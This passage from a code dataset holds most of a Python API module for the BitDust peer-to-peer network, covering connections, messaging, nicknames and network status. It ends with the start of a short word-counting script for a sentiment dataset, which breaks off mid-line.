packet_id in q.ListRequestItems():\r\n i = q.GetRequestItem(packet_id)\r\n if i:\r\n r['incoming'].append({\r\n 'packet_id': i.packetID,\r\n 'owner_id': i.ownerID,\r\n 'remote_id': i.remoteID,\r\n 'customer': i.customerID,\r\n 'remote_path': i.remotePath,\r\n 'filename': i.fileName,\r\n 'created': i.created,\r\n 'requested': i.requestTime,\r\n })\r\n result.append(r)\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef connections_list(wanted_protos=None):\r\n \"\"\"\r\n Returns list of opened/active network connections. 
Argument `wanted_protos`\r\n can be used to select which protocols to list:\r\n\r\n connections_list(wanted_protos=['tcp', 'udp'])\r\n \"\"\"\r\n if not driver.is_on('service_gateway'):\r\n return ERROR('service_gateway() is not started')\r\n from transport import gateway\r\n from userid import global_id\r\n result = []\r\n if not wanted_protos:\r\n wanted_protos = gateway.list_active_transports()\r\n for proto in wanted_protos:\r\n for connection in gateway.list_active_sessions(proto):\r\n item = {\r\n 'status': 'unknown',\r\n 'state': 'unknown',\r\n 'proto': proto,\r\n 'host': 'unknown',\r\n 'global_id': 'unknown',\r\n 'idurl': 'unknown',\r\n 'bytes_sent': 0,\r\n 'bytes_received': 0,\r\n }\r\n if proto == 'tcp':\r\n if hasattr(connection, 'stream'):\r\n try:\r\n host = '%s:%s' % (connection.peer_address[0], connection.peer_address[1])\r\n except:\r\n host = 'unknown'\r\n item.update({\r\n 'status': 'active',\r\n 'state': connection.state,\r\n 'host': host,\r\n 'global_id': global_id.UrlToGlobalID(connection.peer_idurl or ''),\r\n 'idurl': connection.peer_idurl or '',\r\n 'bytes_sent': connection.total_bytes_sent,\r\n 'bytes_received': connection.total_bytes_received,\r\n })\r\n else:\r\n try:\r\n host = '%s:%s' % (connection.connection_address[0], connection.connection_address[1])\r\n except:\r\n host = 'unknown'\r\n item.update({\r\n 'status': 'connecting',\r\n 'host': host,\r\n })\r\n elif proto == 'udp':\r\n try:\r\n host = '%s:%s' % (connection.peer_address[0], connection.peer_address[1])\r\n except:\r\n host = 'unknown'\r\n item.update({\r\n 'status': 'active',\r\n 'state': connection.state,\r\n 'host': host,\r\n 'global_id': global_id.UrlToGlobalID(connection.peer_idurl or ''),\r\n 'idurl': connection.peer_idurl or '',\r\n 'bytes_sent': connection.bytes_sent,\r\n 'bytes_received': connection.bytes_received,\r\n })\r\n result.append(item)\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef streams_list(wanted_protos=None):\r\n \"\"\"\r\n Return list of active sending/receiving files.\r\n \"\"\"\r\n if not driver.is_on('service_gateway'):\r\n return ERROR('service_gateway() is not started')\r\n from transport import gateway\r\n from lib import misc\r\n result = []\r\n if not wanted_protos:\r\n wanted_protos = gateway.list_active_transports()\r\n for proto in wanted_protos:\r\n for stream in gateway.list_active_streams(proto):\r\n item = {\r\n 'proto': proto,\r\n 'stream_id': '',\r\n 'type': '',\r\n 'bytes_current': -1,\r\n 'bytes_total': -1,\r\n 'progress': '0%',\r\n }\r\n if proto == 'tcp':\r\n if hasattr(stream, 'bytes_received'):\r\n item.update({\r\n 'stream_id': stream.file_id,\r\n 'type': 'in',\r\n 'bytes_current': stream.bytes_received,\r\n 'bytes_total': stream.size,\r\n 'progress': misc.value2percent(stream.bytes_received, stream.size, 0)\r\n })\r\n elif hasattr(stream, 'bytes_sent'):\r\n item.update({\r\n 'stream_id': stream.file_id,\r\n 'type': 'out',\r\n 'bytes_current': stream.bytes_sent,\r\n 'bytes_total': stream.size,\r\n 'progress': misc.value2percent(stream.bytes_sent, stream.size, 0)\r\n })\r\n elif proto == 'udp':\r\n if hasattr(stream.consumer, 'bytes_received'):\r\n item.update({\r\n 'stream_id': stream.stream_id,\r\n 'type': 'in',\r\n 'bytes_current': stream.consumer.bytes_received,\r\n 'bytes_total': stream.consumer.size,\r\n 'progress': misc.value2percent(stream.consumer.bytes_received, stream.consumer.size, 0)\r\n })\r\n elif hasattr(stream.consumer, 'bytes_sent'):\r\n item.update({\r\n 
'stream_id': stream.stream_id,\r\n 'type': 'out',\r\n 'bytes_current': stream.consumer.bytes_sent,\r\n 'bytes_total': stream.consumer.size,\r\n 'progress': misc.value2percent(stream.consumer.bytes_sent, stream.consumer.size, 0)\r\n })\r\n result.append(item)\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef queue_list():\r\n \"\"\"\r\n Returns a list of known message queues and the number of pending messages in each.\r\n \"\"\"\r\n from p2p import p2p_queue\r\n return RESULT([{\r\n 'queue_id': queue_id,\r\n 'messages': len(p2p_queue.queue(queue_id)),\r\n } for queue_id in p2p_queue.queue().keys()])\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef user_ping(idurl_or_global_id, timeout=10):\r\n \"\"\"\r\n Sends Identity packet to remote peer and waits for an Ack packet to check connection status.\r\n The \"ping\" command performs the following actions:\r\n\r\n 1. Request the remote identity source by idurl,\r\n 2. Send my Identity to the remote contact addresses, taken from the identity,\r\n 3. Wait for the first Ack packet from the remote peer,\r\n 4. Fail by timeout or on identity fetching error.\r\n\r\n You can use this method to check and be sure that the remote node is alive at the moment.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': '(signed.Packet[Ack(Identity) bob|bob for alice], in_70_19828906(DONE))'}\r\n \"\"\"\r\n if not driver.is_on('service_identity_propagate'):\r\n return ERROR('service_identity_propagate() is not started')\r\n from p2p import propagate\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl):\r\n idurl = global_id.GlobalUserToIDURL(idurl)\r\n ret = Deferred()\r\n d = propagate.PingContact(idurl, int(timeout))\r\n d.addCallback(\r\n lambda resp: ret.callback(\r\n OK(str(resp))))\r\n d.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n\r\ndef user_status(idurl_or_global_id):\r\n \"\"\"\r\n Returns the current online/offline status of the given user.\r\n \"\"\"\r\n if not driver.is_on('service_identity_propagate'):\r\n return ERROR('service_identity_propagate() is not started')\r\n from p2p import contact_status\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl):\r\n idurl = global_id.GlobalUserToIDURL(idurl)\r\n if not contact_status.isKnown(idurl):\r\n return ERROR('unknown user')\r\n state_machine_inst = contact_status.getInstance(idurl)\r\n if not state_machine_inst:\r\n return ERROR('error fetching user status')\r\n return RESULT([{\r\n 'contact_status': contact_status.stateToLabel(state_machine_inst.state),\r\n 'contact_state': state_machine_inst.state,\r\n 'idurl': idurl,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n }])\r\n\r\n\r\ndef user_status_check(idurl_or_global_id, timeout=5):\r\n \"\"\"\r\n Pings the given user and waits until his status becomes either CONNECTED or OFFLINE.\r\n \"\"\"\r\n if not driver.is_on('service_identity_propagate'):\r\n return ERROR('service_identity_propagate() is not started')\r\n from p2p import contact_status\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl):\r\n idurl = global_id.GlobalUserToIDURL(idurl)\r\n peer_status = contact_status.getInstance(idurl)\r\n if not peer_status:\r\n return ERROR('failed to check peer status')\r\n ret = Deferred()\r\n\r\n def _on_peer_status_state_changed(oldstate, newstate, event_string, args):\r\n if newstate not in ['CONNECTED', 'OFFLINE', ]:\r\n return None\r\n if newstate == 'OFFLINE' and oldstate == 'OFFLINE' and not event_string == 'ping-failed':\r\n return None\r\n ret.callback(OK(extra_fields=dict(\r\n idurl=idurl,\r\n 
global_id=global_id.UrlToGlobalID(idurl),\r\n contact_state=newstate,\r\n contact_status=contact_status.stateToLabel(newstate),\r\n )))\r\n return None\r\n\r\n def _do_clean(x):\r\n peer_status.removeStateChangedCallback(_on_peer_status_state_changed)\r\n return x\r\n\r\n ret.addCallback(_do_clean)\r\n\r\n peer_status.addStateChangedCallback(_on_peer_status_state_changed)\r\n peer_status.automat('ping', timeout)\r\n return ret\r\n\r\n\r\ndef user_search(nickname, attempts=1):\r\n \"\"\"\r\n Starts nickname_observer() Automat to look up an existing nickname registered\r\n in the DHT network.\r\n \"\"\"\r\n from lib import misc\r\n from userid import global_id\r\n if not nickname:\r\n return ERROR('requires nickname of the user')\r\n if not misc.ValidNickName(nickname):\r\n return ERROR('invalid nickname')\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n\r\n from chat import nickname_observer\r\n # nickname_observer.stop_all()\r\n ret = Deferred()\r\n\r\n def _result(result, nik, pos, idurl):\r\n return ret.callback(RESULT([{\r\n 'result': result,\r\n 'nickname': nik,\r\n 'position': pos,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'idurl': idurl,\r\n }]))\r\n\r\n nickname_observer.find_one(\r\n nickname,\r\n attempts=attempts,\r\n results_callback=_result,\r\n )\r\n return ret\r\n\r\n\r\ndef user_observe(nickname, attempts=3):\r\n \"\"\"\r\n Starts nickname_observer() Automat to look up an existing nickname registered\r\n in the DHT network.\r\n \"\"\"\r\n from lib import misc\r\n from userid import global_id\r\n if not nickname:\r\n return ERROR('requires nickname of the user')\r\n if not misc.ValidNickName(nickname):\r\n return ERROR('invalid nickname')\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n\r\n from chat import nickname_observer\r\n nickname_observer.stop_all()\r\n ret = Deferred()\r\n results = []\r\n\r\n def _result(result, nik, pos, idurl):\r\n if result != 'finished':\r\n results.append({\r\n 'result': result,\r\n 'nickname': nik,\r\n 'position': pos,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'idurl': idurl,\r\n })\r\n return None\r\n ret.callback(RESULT(results, ))\r\n return None\r\n\r\n from twisted.internet import reactor\r\n reactor.callLater(0.05, nickname_observer.observe_many,\r\n nickname,\r\n attempts=attempts,\r\n results_callback=_result,\r\n )\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef nickname_get():\r\n \"\"\"\r\n Returns your current nickname from the local settings.\r\n \"\"\"\r\n from main import settings\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n return OK(extra_fields={'nickname': settings.getNickName(), })\r\n\r\n\r\ndef nickname_set(nickname):\r\n \"\"\"\r\n Starts nickname_holder() machine to register and keep your nickname in the DHT\r\n network.\r\n \"\"\"\r\n from lib import misc\r\n if not nickname:\r\n return ERROR('requires nickname of the user')\r\n if not misc.ValidNickName(nickname):\r\n return ERROR('invalid nickname')\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n from chat import nickname_holder\r\n from main import settings\r\n from userid import my_id\r\n settings.setNickName(nickname)\r\n ret = Deferred()\r\n\r\n 
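# one-shot callback: unregister from nickname_holder() and resolve the Deferred with the outcome\r\n def _nickname_holder_result(result, key):\r\n nickname_holder.A().remove_result_callback(_nickname_holder_result)\r\n return 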
ret.callback(OK(extra_fields={\r\n 'result': result,\r\n 'nickname': key,\r\n 'global_id': my_id.getGlobalID(),\r\n 'idurl': my_id.getLocalID(),\r\n }))\r\n\r\n nickname_holder.A().add_result_callback(_nickname_holder_result)\r\n nickname_holder.A('set', nickname)\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef message_send(recipient, json_data, timeout=5):\r\n \"\"\"\r\n Sends a text message to remote peer, `recipient` is a string with nickname or global_id.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': ['signed.Packet[Message(146681300413)]']}\r\n \"\"\"\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n from chat import message\r\n from userid import global_id\r\n from crypt import my_keys\r\n if not recipient.count('@'):\r\n from contacts import contactsdb\r\n recipient_idurl = contactsdb.find_correspondent_by_nickname(recipient)\r\n if not recipient_idurl:\r\n return ERROR('recipient not found')\r\n recipient = global_id.UrlToGlobalID(recipient_idurl)\r\n glob_id = global_id.ParseGlobalID(recipient)\r\n if not glob_id['idurl']:\r\n return ERROR('wrong recipient')\r\n target_glob_id = global_id.MakeGlobalID(**glob_id)\r\n if not my_keys.is_valid_key_id(target_glob_id):\r\n return ERROR('invalid key_id: %s' % target_glob_id)\r\n# if not my_keys.is_key_registered(target_glob_id):\r\n# return ERROR('unknown key_id: %s' % target_glob_id)\r\n lg.out(4, 'api.message_send to \"%s\"' % target_glob_id)\r\n result = message.send_message(\r\n json_data=json_data,\r\n recipient_global_id=target_glob_id,\r\n timeout=timeout,\r\n )\r\n ret = Deferred()\r\n result.addCallback(\r\n lambda packet: ret.callback(\r\n OK(str(packet))))\r\n result.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n\r\n\r\ndef message_receive(consumer_id):\r\n \"\"\"\r\n This method can be used to listen for and process incoming chat messages by a specific consumer.\r\n If there are no messages received yet, this method will be waiting for any incomings.\r\n If some messages were already received, but not yet \"consumed\", the method will return them immediately.\r\n After you got the response and processed the messages you should call this method again to listen\r\n for more incomings. 
This is similar to a message queue polling interface.\r\n If you do not \"consume\" messages, the \"consumer\" will be dropped after 100 un-collected messages.\r\n Both incoming and outgoing messages will be populated here.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'type': 'private_message',\r\n 'dir': 'incoming',\r\n 'id': '123456788',\r\n 'sender': 'abc$alice@first-host.com',\r\n 'recipient': 'abc$bob@second-host.net',\r\n 'message': 'Hello World!',\r\n 'time': 123456789\r\n }]}\r\n \"\"\"\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n from chat import message\r\n ret = Deferred()\r\n\r\n def _on_pending_messages(pending_messages):\r\n result = []\r\n for msg in pending_messages:\r\n if msg['type'] != 'private_message':\r\n continue\r\n result.append({\r\n 'data': msg['data'],\r\n 'recipient': msg['to'],\r\n 'sender': msg['from'],\r\n 'time': msg['time'],\r\n 'message_id': msg['id'],\r\n 'dir': msg['dir'],\r\n })\r\n lg.out(4, 'api.message_receive._on_pending_messages returning : %s' % result)\r\n ret.callback(OK(result))\r\n return len(result) > 0\r\n\r\n d = message.consume_messages(consumer_id)\r\n d.addCallback(_on_pending_messages)\r\n d.addErrback(lambda err: ret.callback(ERROR(str(err))))\r\n lg.out(4, 'api.message_receive \"%s\"' % consumer_id)\r\n return ret\r\n\r\n\r\ndef messages_get_all(index_name, limit, offset, with_doc, with_storage):\r\n \"\"\"\r\n Returns all chat messages stored in the local messages database.\r\n \"\"\"\r\n if not driver.is_on('service_private_messages'):\r\n return ERROR('service_private_messages() is not started')\r\n from chat import message_db\r\n r = [m for m in message_db.get_all(index_name, limit, offset, with_doc, with_storage)]\r\n return RESULT(r)\r\n\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef broadcast_send_message(payload):\r\n \"\"\"\r\n Sends a broadcast message to all peers in the network.\r\n\r\n The message must be provided in the `payload` argument as a JSON object.\r\n\r\n WARNING! 
Please do not send too often and do not send more than\r\n several kilobytes per message.\r\n \"\"\"\r\n if not driver.is_on('service_broadcasting'):\r\n return ERROR('service_broadcasting() is not started')\r\n from broadcast import broadcast_service\r\n from broadcast import broadcast_listener\r\n from broadcast import broadcaster_node\r\n msg = broadcast_service.send_broadcast_message(payload)\r\n current_states = dict()\r\n if broadcaster_node.A():\r\n current_states[broadcaster_node.A().name] = broadcaster_node.A().state\r\n if broadcast_listener.A():\r\n current_states[broadcast_listener.A().name] = broadcast_listener.A().state\r\n lg.out(4, 'api.broadcast_send_message : %s, %s' % (msg, current_states))\r\n return RESULT([msg, current_states, ])\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef event_send(event_id, json_data=None):\r\n \"\"\"\r\n Fires a new event with the given ID on the local node, optionally with a JSON payload.\r\n \"\"\"\r\n import json\r\n from main import events\r\n json_payload = None\r\n json_length = 0\r\n if json_data and (isinstance(json_data, str) or isinstance(json_data, unicode)):\r\n json_length = len(json_data)\r\n try:\r\n json_payload = json.loads(json_data or '{}')\r\n except:\r\n return ERROR('json data payload is not correct')\r\n evt = events.send(event_id, data=json_payload)\r\n lg.out(4, 'api.event_send \"%s\" was fired to local node with %d bytes payload' % (event_id, json_length, ))\r\n return OK({'event_id': event_id, 'created': evt.created, })\r\n\r\ndef events_listen(consumer_id):\r\n \"\"\"\r\n Waits for pending events for the given consumer, similar to message_receive().\r\n \"\"\"\r\n from main import events\r\n ret = Deferred()\r\n\r\n def _on_pending_events(pending_events):\r\n result = []\r\n for evt in pending_events:\r\n if evt['type'] != 'event':\r\n continue\r\n result.append({\r\n 'id': evt['id'],\r\n 'data': evt['data'],\r\n 'time': evt['time'],\r\n })\r\n # lg.out(4, 'api.events_listen._on_pending_events returning : %s' % result)\r\n ret.callback(OK(result))\r\n return len(result) > 0\r\n\r\n d = events.consume_events(consumer_id)\r\n d.addCallback(_on_pending_events)\r\n d.addErrback(lambda err: ret.callback(ERROR(str(err))))\r\n # lg.out(4, 'api.events_listen \"%s\"' % consumer_id)\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef network_stun(udp_port=None, dht_port=None):\r\n \"\"\"\r\n Begins a STUN process to detect your external IP address, returns a Deferred with the result.\r\n \"\"\"\r\n from stun import stun_client\r\n ret = Deferred()\r\n d = stun_client.safe_stun(udp_port=udp_port, dht_port=dht_port)\r\n d.addBoth(lambda r: ret.callback(RESULT([r, ])))\r\n return ret\r\n\r\n\r\ndef network_reconnect():\r\n \"\"\"\r\n Sends \"reconnect\" event to network_connector() Automat in order to refresh\r\n network connection.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'reconnected'}\r\n \"\"\"\r\n if not driver.is_on('service_network'):\r\n return ERROR('service_network() is not started')\r\n from p2p import network_connector\r\n lg.out(4, 'api.network_reconnect')\r\n network_connector.A('reconnect')\r\n return OK('reconnected')\r\n\r\n\r\ndef network_connected(wait_timeout=5):\r\n \"\"\"\r\n Ensures the BitDust software is connected to other nodes in the network.\r\n If all is good this method will block for `wait_timeout` seconds.\r\n In case of some network issues the method will return a result asap.\r\n \"\"\"\r\n if not driver.is_on('service_network'):\r\n return ERROR('service_network() is not started')\r\n from twisted.internet import reactor\r\n from userid import my_id\r\n from automats import automat\r\n ret = Deferred()\r\n\r\n p2p_connector_lookup = automat.find('p2p_connector')\r\n if p2p_connector_lookup:\r\n 
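# fast path: when p2p_connector() is already CONNECTED, just hold the caller for wait_timeout seconds and reply OK\r\n 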
p2p_connector_machine = automat.objects().get(p2p_connector_lookup[0])\r\n if p2p_connector_machine and p2p_connector_machine.state == 'CONNECTED':\r\n wait_timeout_defer = Deferred()\r\n wait_timeout_defer.addTimeout(wait_timeout, clock=reactor)\r\n wait_timeout_defer.addBoth(lambda _: ret.callback(OK('connected')))\r\n return ret\r\n\r\n if not my_id.isLocalIdentityReady():\r\n lg.warn('local identity is not valid or not exist')\r\n return ERROR('local identity is not valid or not exist', extra_fields={'reason': 'identity_not_exist'})\r\n if not driver.is_enabled('service_network'):\r\n lg.warn('service_network() is disabled')\r\n return ERROR('service_network() is disabled', extra_fields={'reason': 'service_network_disabled'})\r\n if not driver.is_enabled('service_gateway'):\r\n lg.warn('service_gateway() is disabled')\r\n return ERROR('service_gateway() is disabled', extra_fields={'reason': 'service_gateway_disabled'})\r\n if not driver.is_enabled('service_p2p_hookups'):\r\n lg.warn('service_p2p_hookups() is disabled')\r\n return ERROR('service_p2p_hookups() is disabled', extra_fields={'reason': 'service_p2p_hookups_disabled'})\r\n\r\n def _do_p2p_connector_test():\r\n try:\r\n p2p_connector_lookup = automat.find('p2p_connector')\r\n if not p2p_connector_lookup:\r\n lg.warn('disconnected, reason is \"p2p_connector_not_found\"')\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': 'p2p_connector_not_found'}))\r\n return None\r\n p2p_connector_machine = automat.objects().get(p2p_connector_lookup[0])\r\n if not p2p_connector_machine:\r\n lg.warn('disconnected, reason is \"p2p_connector_not_exist\"')\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': 'p2p_connector_not_exist'}))\r\n return None\r\n if p2p_connector_machine.state != 'CONNECTED':\r\n lg.warn('disconnected, reason is \"p2p_connector_disconnected\", sending \"check-synchronize\" event to p2p_connector()')\r\n p2p_connector_machine.automat('check-synchronize')\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': 'p2p_connector_disconnected'}))\r\n return None\r\n ret.callback(OK('connected'))\r\n except:\r\n lg.exc()\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': 'p2p_connector_error'}))\r\n return None\r\n\r\n def _on_service_restarted(resp, service_name):\r\n if service_name == 'service_network':\r\n _do_service_test('service_gateway')\r\n elif service_name == 'service_gateway':\r\n _do_service_test('service_p2p_hookups')\r\n else:\r\n _do_p2p_connector_test()\r\n return resp\r\n\r\n def _do_service_restart(service_name):\r\n d = service_restart(service_name, wait_timeout=wait_timeout)\r\n d.addCallback(_on_service_restarted, service_name)\r\n d.addErrback(lambda err: ret.callback(dict(\r\n ERROR(err.getErrorMessage()).items() + {'reason': '{}_restart_error'.format(service_name)}.items())))\r\n return None\r\n\r\n def _do_service_test(service_name):\r\n try:\r\n svc_info = service_info(service_name)\r\n svc_state = svc_info['result'][0]['state']\r\n except:\r\n lg.exc()\r\n ret.callback(ERROR('disconnected', extra_fields={'reason': '{}_info_error'.format(service_name)}))\r\n return None\r\n if svc_state != 'ON':\r\n _do_service_restart(service_name)\r\n return None\r\n if service_name == 'service_network':\r\n reactor.callLater(0, _do_service_test, 'service_gateway')\r\n elif service_name == 'service_gateway':\r\n reactor.callLater(0, _do_service_test, 'service_p2p_hookups')\r\n else:\r\n reactor.callLater(0, _do_p2p_connector_test)\r\n return None\r\n\r\n 
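# ---------------------------------------------------------------------------
# Editor's aside (not part of the api.py record above): a minimal,
# self-contained sketch of the Twisted idiom used at the top of
# network_connected() -- an auxiliary Deferred armed with addTimeout() so the
# returned Deferred always fires after at most `wait_timeout` seconds.
# All names below are illustrative, not part of the BitDust code.
from twisted.internet import defer, reactor

def fire_after_at_most(wait_timeout=5):
    ret = defer.Deferred()
    waiter = defer.Deferred()
    waiter.addTimeout(wait_timeout, clock=reactor)
    # addBoth() runs on the success *and* the TimeoutError path, so `ret`
    # is guaranteed to resolve once the timeout elapses.
    waiter.addBoth(lambda _: ret.callback('connected'))
    return ret
# ---------------------------------------------------------------------------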
_do_service_test('service_network')\r\n return ret\r\n\r\n\r\ndef network_status(show_suppliers=True, show_customers=True, show_cache=True,\r\n show_tcp=True, show_udp=True, show_proxy=True, ):\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_network'):\r\n return ERROR('service_network() is not started')\r\n from automats import automat\r\n from main import settings\r\n from userid import my_id\r\n from userid import global_id\r\n\r\n def _tupl_addr_to_str(addr):\r\n if not addr:\r\n return None\r\n return ':'.join(map(str, addr))\r\n\r\n r = {\r\n 'p2p_connector_state': None,\r\n 'network_connector_state': None,\r\n 'idurl': None,\r\n 'global_id': None,\r\n }\r\n p2p_connector_lookup = automat.find('p2p_connector')\r\n if p2p_connector_lookup:\r\n p2p_connector_machine = automat.objects().get(p2p_connector_lookup[0])\r\n if p2p_connector_machine:\r\n r['p2p_connector_state'] = p2p_connector_machine.state\r\n network_connector_lookup = automat.find('network_connector')\r\n if network_connector_lookup:\r\n network_connector_machine = automat.objects().get(network_connector_lookup[0])\r\n if network_connector_machine:\r\n r['network_connector_state'] = network_connector_machine.state\r\n if my_id.isLocalIdentityReady():\r\n r['idurl'] = my_id.getLocalID()\r\n r['global_id'] = my_id.getGlobalID()\r\n if True in [show_suppliers, show_customers, show_cache, ]:\r\n if not driver.is_on('service_p2p_hookups'):\r\n return ERROR('service_p2p_hookups() is not started')\r\n from contacts import contactsdb\r\n from p2p import contact_status\r\n if show_suppliers:\r\n connected = 0\r\n items = []\r\n for idurl in contactsdb.all_suppliers():\r\n i = {\r\n 'idurl': idurl,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'state': None\r\n }\r\n inst = contact_status.getInstance(idurl)\r\n if inst:\r\n i['state'] = inst.state\r\n if inst.state == 'CONNECTED':\r\n connected += 1\r\n items.append(i)\r\n r['suppliers'] = {\r\n 'desired': settings.getSuppliersNumberDesired(),\r\n 'requested': contactsdb.num_suppliers(),\r\n 'connected': connected,\r\n 'total': contactsdb.total_suppliers(),\r\n 'peers': items,\r\n }\r\n if show_customers:\r\n connected = 0\r\n items = []\r\n for idurl in contactsdb.customers():\r\n i = {\r\n 'idurl': idurl,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'state': None\r\n }\r\n inst = contact_status.getInstance(idurl)\r\n if inst:\r\n i['state'] = inst.state\r\n if inst.state == 'CONNECTED':\r\n connected += 1\r\n items.append(i)\r\n r['customers'] = {\r\n 'connected': connected,\r\n 'total': contactsdb.num_customers(),\r\n 'peers': items,\r\n }\r\n if show_cache:\r\n from contacts import identitycache\r\n connected = 0\r\n items = []\r\n for idurl in identitycache.Items().keys():\r\n i = {\r\n 'idurl': idurl,\r\n 'global_id': global_id.UrlToGlobalID(idurl),\r\n 'state': None\r\n }\r\n inst = contact_status.getInstance(idurl)\r\n if inst:\r\n i['state'] = inst.state\r\n if inst.state == 'CONNECTED':\r\n connected += 1\r\n items.append(i)\r\n r['cache'] = {\r\n 'total': identitycache.CacheLen(),\r\n 'connected': connected,\r\n 'peers': items,\r\n }\r\n if True in [show_tcp, show_udp, show_proxy, ]:\r\n from transport import gateway\r\n if show_tcp:\r\n r['tcp'] = {\r\n 'sessions': [],\r\n 'streams': [],\r\n }\r\n if driver.is_on('service_tcp_transport'):\r\n sessions = []\r\n for s in gateway.list_active_sessions('tcp'):\r\n i = {\r\n 'peer': getattr(s, 'peer', None),\r\n 'state': getattr(s, 'state', None),\r\n 'id': getattr(s, 'id', None),\r\n 'idurl': getattr(s, 
'peer_idurl', None),\r\n 'address': _tupl_addr_to_str(getattr(s, 'peer_address', None)),\r\n 'external_address': _tupl_addr_to_str(getattr(s, 'peer_external_address', None)),\r\n 'connection_address': _tupl_addr_to_str(getattr(s, 'connection_address', None)),\r\n 'bytes_received': getattr(s, 'total_bytes_received', 0),\r\n 'bytes_sent': getattr(s, 'total_bytes_sent', 0),\r\n }\r\n sessions.append(i)\r\n streams = []\r\n for s in gateway.list_active_streams('tcp'):\r\n i = {\r\n 'started': s.started,\r\n 'stream_id': s.file_id,\r\n 'transfer_id': s.transfer_id,\r\n 'size': s.size,\r\n 'type': s.typ,\r\n }\r\n streams.append(i)\r\n r['tcp']['sessions'] = sessions\r\n r['tcp']['streams'] = streams\r\n if show_udp:\r\n r['udp'] = {\r\n 'sessions': [],\r\n 'streams': [],\r\n }\r\n if driver.is_on('service_udp_transport'):\r\n sessions = []\r\n for s in gateway.list_active_sessions('udp'):\r\n sessions.append({\r\n 'peer': s.peer_id,\r\n 'state': s.state,\r\n 'id': s.id,\r\n 'idurl': s.peer_idurl,\r\n 'address': _tupl_addr_to_str(s.peer_address),\r\n 'bytes_received': s.bytes_received,\r\n 'bytes_sent': s.bytes_sent,\r\n 'outgoing': len(s.file_queue.outboxFiles),\r\n 'incoming': len(s.file_queue.inboxFiles),\r\n 'queue': len(s.file_queue.outboxQueue),\r\n 'dead_streams': len(s.file_queue.dead_streams),\r\n })\r\n streams = []\r\n for s in gateway.list_active_streams('udp'):\r\n streams.append({\r\n 'started': s.started,\r\n 'stream_id': s.stream_id,\r\n 'transfer_id': s.transfer_id,\r\n 'size': s.size,\r\n 'type': s.typ,\r\n })\r\n r['udp']['sessions'] = sessions\r\n r['udp']['streams'] = streams\r\n if show_proxy:\r\n r['proxy'] = {\r\n 'sessions': [],\r\n }\r\n if driver.is_on('service_proxy_transport'):\r\n sessions = []\r\n for s in gateway.list_active_sessions('proxy'):\r\n i = {\r\n 'state': s.state,\r\n 'id': s.id,\r\n }\r\n if getattr(s, 'router_proto_host', None):\r\n i['proto'] = s.router_proto_host[0]\r\n i['peer'] = s.router_proto_host[1]\r\n if getattr(s, 'router_idurl', None):\r\n i['idurl'] = s.router_idurl\r\n i['router'] = global_id.UrlToGlobalID(s.router_idurl)\r\n if getattr(s, 'traffic_out', None):\r\n i['bytes_sent'] = s.traffic_out\r\n if getattr(s, 'traffic_in', None):\r\n i['bytes_received'] = s.traffic_in\r\n if getattr(s, 'pending_packets', None):\r\n i['queue'] = len(s.pending_packets)\r\n sessions.append(i)\r\n r['proxy']['sessions'] = sessions\r\n return RESULT([r, ])\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef pdb_shell():\r\n import pdb; pdb.set_trace()\r\n return OK()\r\n\r\n#------------------------------------------------------------------------------","repo_name":"vesellov/bitdust.public.old","sub_path":"interface/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":128652,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"86"} +{"seq_id":"12650996979","text":"from collections import Counter\r\n\r\nwith open(\"dataset/clean_positive_sentences.txt\", encoding=\"utf-8\") as f:\r\n content = f.readlines()\r\ncontent = [x.strip() for x in content]\r\n\r\nwordlist = []\r\nfor line in content:\r\n wordlist += line.split()\r\n\r\nwords = dict(Counter(wordlist))\r\nwords = dict(sorted(words.items(), key=lambda x:x))\r\n\r\nf = open('dataset/positive_words_not_stemmed.txt', 'w', encoding='utf-8')\r\ncount = 1\r\nfor x,y in words.items():\r\n print(count)\r\n count += 1\r\n f.write(x + ' ' + str(y) + 
